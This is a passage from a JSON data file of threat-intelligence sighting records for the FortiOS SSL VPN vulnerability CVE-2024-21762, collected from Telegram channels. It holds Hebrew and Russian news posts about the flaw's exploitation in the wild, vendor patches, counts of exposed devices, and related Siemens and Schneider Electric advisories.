"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "Telegram/vgJEr2togM3_INz4_9e87xLDgzKKwLZ_xa69fax-SPvspcA", "content": "", "creation_timestamp": "2024-02-11T02:38:32.000000Z"}, {"uuid": "6ef2dc77-f1d2-4bab-8870-8d21936f1095", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/CyberSecurityIL/37737", "content": "\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 - \u05d7\u05d5\u05dc\u05e9\u05d4 \u05e7\u05e8\u05d9\u05d8\u05d9\u05ea \u05d7\u05d3\u05e9\u05d4 \u05d1\u05de\u05d5\u05e6\u05e8 FortiOS SSL VPN \u05de\u05e0\u05d5\u05e6\u05dc\u05ea \u05e2\"\u05d9 \u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05de\u05e1\u05d1\u05d9\u05d1 \u05dc\u05e2\u05d5\u05dc\u05dd.\n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 CVE-2024-21762 \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05dc\u05d4\u05e8\u05d9\u05e5 \u05e7\u05d5\u05d3 \u05de\u05e8\u05d7\u05d5\u05e7 \u05dc\u05dc\u05d0 \u05e6\u05d5\u05e8\u05da \u05d1\u05d4\u05d6\u05d3\u05d4\u05d5\u05ea.\n\n\u05ea\u05d9\u05e7\u05d5\u05df \u05e4\u05d5\u05e8\u05e1\u05dd \u05d1\u05de\u05e1\u05e4\u05e8 \u05d2\u05e8\u05e1\u05d0\u05d5\u05ea, \u05de\u05e6\"\u05d1 \u05db\u05dc \u05d4\u05d2\u05e8\u05e1\u05d0\u05d5\u05ea \u05d4\u05ea\u05e7\u05d9\u05e0\u05d5\u05ea \u05d1\u05ea\u05d2\u05d5\u05d1\u05d5\u05ea \u05dc\u05e4\u05d5\u05e1\u05d8 \u2b07\ufe0f\n\n#\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea", "creation_timestamp": "2024-02-18T19:48:56.000000Z"}, {"uuid": "a17d9cbd-0cfc-42d6-ba5e-5aaf80a86e4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/ctinow/196164", "content": "https://ift.tt/bdwI5ut\nCVE-2024-21762 Exploit", "creation_timestamp": "2024-02-29T04:17:14.000000Z"}, {"uuid": "c6bbe29e-d106-4a6c-a657-9d8a5c9b9ec4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/ctinow/212242", "content": "https://ift.tt/OA8GrM4\nScans for Fortinet FortiOS and the CVE-2024-21762 vulnerability, (Wed, Mar 20th)", "creation_timestamp": "2024-03-20T15:11:27.000000Z"}, {"uuid": "2beff80e-bb0b-42b5-abd7-5e07e827af8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/true_secator/5396", "content": "Fortinet \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u043d\u043e\u0432\u043e\u0439 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 FortiOS SSL VPN, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\nCVE-2024-21762 (FG-IR-24-015) \u0438\u043c\u0435\u0435\u0442 \u0440\u0435\u0439\u0442\u0438\u043d\u0433 CVSS 9,6 \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0433\u0440\u0430\u043d\u0438\u0446 \u0432 FortiOS.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0438\u043b\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0447\u0435\u0440\u0435\u0437 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u044b.\n\n\u0414\u043b\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0448\u0438\u0431\u043a\u0438, Fortinet \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439, \u0430 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0435\u0441\u043b\u0438 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0435 \u0443\u0434\u0430\u0435\u0442\u0441\u044f - \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043c\u043e\u0436\u043d\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c, \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0432 SSL VPN \u043d\u0430 \u0441\u0432\u043e\u0438\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0441 FortiOS.\n\n\u0427\u0442\u043e \u0436\u0435 \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, Fortinet \u043d\u0435 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439, \u0440\u0430\u0432\u043d\u043e \u0438 \u0442\u043e\u043c, \u043a\u0442\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c.\n\n\u0418\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043b\u0438\u0448\u044c \u0442\u043e, \u0447\u0442\u043e \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043d\u0430\u0440\u044f\u0434\u0443 \u0441 \u043d\u0435\u0439 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u0440\u0430\u0441\u043a\u0440\u044b\u043b \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0438 \u043f\u043e \u0434\u0440\u0443\u0433\u0438\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c, \u0441\u0440\u0435\u0434\u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0445: CVE-2024-23113 (\u0440\u0435\u0439\u0442\u0438\u043d\u0433 9,8), CVE-2023-44487 \u0438 CVE-2023-47537 (\u043e\u0431\u0435 \u0441\u043e \u0441\u0440\u0435\u0434\u043d\u0438\u043c \u0440\u0435\u0439\u0442\u0438\u043d\u0433\u043e\u043c). \u041e\u0434\u043d\u0430\u043a\u043e \u0438\u0445 \u043d\u0435 \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438 \u043a\u0430\u043a \u0440\u0435\u0430\u043b\u044c\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0435.\n\n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0432 \u0432\u0438\u0434\u0443 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0438 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f CVE-2024-21762 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445, \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430.", "creation_timestamp": "2024-02-09T11:20:05.000000Z"}, {"uuid": "81a45232-0a7c-4f2c-9ebe-2706d253feda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/true_secator/5521", "content": "\u041e\u0447\u0435\u0440\u0435\u0434\u043d\u0430\u044f \u043f\u0430\u0440\u0442\u0438\u044f \u0438\u0437 \u0431\u043e\u043b\u0435\u0435 200 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u0430\u043a\u0440\u044b\u0442\u0430 Siemens \u0438 Schneider Electric \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0437\u0430 \u043c\u0430\u0440\u0442 2024 \u0433\u043e\u0434\u0430.\n\nSiemens\u00a0\u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 11 \u043d\u043e\u0432\u044b\u0445 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439, \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0449\u0438\u0445 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 214 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u043c\u0443 \u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0442\u0435\u043b\u044e Simatic RF160B.\n\n\u0414\u0432\u0430 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c FortiOS \u0438 Fortigate, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 Fortigate NGFW \u0438\u043d\u0442\u0435\u0433\u0440\u0438\u0440\u043e\u0432\u0430\u043d \u0441 \u043a\u043e\u043c\u043c\u0443\u0442\u0430\u0442\u043e\u0440\u0430\u043c\u0438 \u0438 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u043c\u0438 Ruggedcom, \u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Fortinet \u0442\u0430\u043a\u0436\u0435 \u0432\u043b\u0438\u044f\u044e\u0442 \u043d\u0430 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0443 \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430 \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 Siemens Ruggedcom APE1808.\n\n\u041e\u0434\u043d\u0430 \u0438\u0437 \u0434\u0432\u0443\u0445 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 Ruggedcom APE1808 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u0435\u043c\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c, \u0430 \u0434\u0440\u0443\u0433\u0438\u0435\u00a038.\u00a0\u041e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a RCE, MitM-\u0430\u0442\u0430\u043a\u0430\u043c, \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043e\u0431\u0445\u043e\u0434\u0443 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 DoS.\n\n\u0412 \u0447\u0438\u0441\u043b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 Fortinet -\u00a0CVE-2024-21762\u00a0,\u00a0CVE-2023-27997\u00a0\u0438\u00a0CVE-2022-41328, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438.\u00a0\n\n\u041f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u044b\u0439 \u0433\u0438\u0433\u0430\u043d\u0442 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044c \u0441 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435\u043c \u0442\u0440\u0435\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u043f\u043e\u0436\u0430\u0440\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b Sinteso EN \u0438 Cerberus PRO EN.\u00a0\n\n\u041e\u0434\u043d\u0430 \u0438\u0437 \u043d\u0438\u0445 \u0431\u044b\u043b\u0430 \u043e\u0446\u0435\u043d\u0435\u043d\u0430 \u043a\u0430\u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f (CVSS 10) \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443, \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0432 \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0433\u043b\u0430 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430, \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 Sinema Remote Connect Server.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0432 Siemens Sentron (DoS) \u0438 Solid Edge (RCE).\n\nSiemens \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432, \u043d\u043e \u0434\u043b\u044f \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0435\u0449\u0435 \u043d\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b.\n\nSchneider Electric\u00a0\u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u0432\u0430 \u043d\u043e\u0432\u044b\u0445 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f.\n\n\u0412 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u043d\u0438\u0445 \u043e\u043f\u0438\u0441\u0430\u043d\u044b \u0442\u0440\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Easergy T200 RTU \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u0441\u0435\u0442\u044f\u043c\u0438 \u043e\u0431\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0440\u0435\u0434\u043d\u0435\u0433\u043e \u0438 \u043d\u0438\u0437\u043a\u043e\u0433\u043e \u043d\u0430\u043f\u0440\u044f\u0436\u0435\u043d\u0438\u044f.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u043c\u0435\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0438 \u0432\u044b\u0441\u043e\u043a\u0443\u044e \u0441\u0442\u0435\u043f\u0435\u043d\u044c \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439, RCE \u0438 \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u0441\u043d\u044f\u0442\u043e \u0441 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u043a\u043e\u043d\u0446\u0435 2021 \u0433\u043e\u0434\u0430, \u0438 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u043d\u0435 \u0431\u0443\u0434\u0435\u0442.\u00a0\u041a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0431\u044b\u043b\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043d\u043e \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043d\u0430 PowerLogic T300.\n\n\u0414\u0440\u0443\u0433\u043e\u0439 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044c Schneider \u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 EcoStruxure Power Design \u2013 Ecodial.", "creation_timestamp": "2024-03-14T13:00:08.000000Z"}, {"uuid": "b6b96762-a1ef-484d-a064-cacf375ee5e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/true_secator/5504", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Shadowserver \u0434\u0430\u044e\u0442 \u043d\u0435\u0443\u0442\u0435\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0443, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043e\u043a\u043e\u043b\u043e 150 000 \u0432\u0435\u0431-\u0448\u043b\u044e\u0437\u043e\u0432 Fortinet FortiOS \u0438 FortiProxy \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 CVE-2024-21762, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u0431\u043e\u043b\u0435\u0435 24 000 - \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u0421\u0428\u0410, \u0437\u0430 \u043d\u0438\u043c\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0442 \u0418\u043d\u0434\u0438\u044f, \u0411\u0440\u0430\u0437\u0438\u043b\u0438\u044f \u0438 \u041a\u0430\u043d\u0430\u0434\u0430. \n\n\u0418 \u0432\u0441\u0435 \u044d\u0442\u043e \u043f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0430\u044f CISA \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0438 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0430 \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0441\u0432\u043e\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 (KEV), \u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0441 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0430.\n\n\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f CVE-2024-21762 (CVSS 9,8, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e NIST), \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b.\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u043e \u0442\u043e\u043c, \u043a\u0442\u043e \u0438 \u043a\u0430\u043a \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0432 \u0441\u0432\u043e\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445, \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u044b \u0438, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 